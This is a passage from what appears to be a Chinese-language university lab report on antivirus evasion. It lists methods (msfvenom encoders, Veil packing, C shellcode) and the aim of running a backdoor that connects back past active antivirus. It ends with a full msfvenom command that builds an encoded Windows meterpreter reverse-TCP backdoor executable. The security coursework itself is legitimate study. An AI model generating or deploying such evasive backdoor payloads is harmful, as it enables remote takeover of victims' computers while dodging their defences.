免殺原理與實踐

一、實驗內容

1、方法

• 對後門實驗中的msf編碼器進行進一步的探索使用，使用msfvenom指令生成如jar之類的檔案，從而嘗試達到免殺的目的；
• 通過Veil等工具對目標程式進行加殼或者其他操作來實現免殺；
• 使用C+ShellCode程式設計實現免殺；

2、應用
  通過組合應用各種技術儘可能地實現惡意程式碼免殺或者是與殺軟共生（如果成功實現了免殺的，簡單語言描述原理，不要截圖；與殺軟共生的結果驗證要截圖）
3、拓展
  用另一電腦配合進行實測，在殺軟開啟的情況下，可以成功執行程式並回連成功（註明電腦的殺軟名稱與版本）

二、實驗要求

1、殺軟是如何檢測出惡意程式碼的？
2、免殺是做什麼？
3、免殺的基本方法有哪些？

三、實驗過程

1、免殺方法測試
（1）使用編輯器msf實現免殺。首先和上一個實驗一樣，使用msfvenom指令生成後門程式，程式碼如下。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.203 LPORT=9000 -f exe > 20192409pzy_backdoor.exe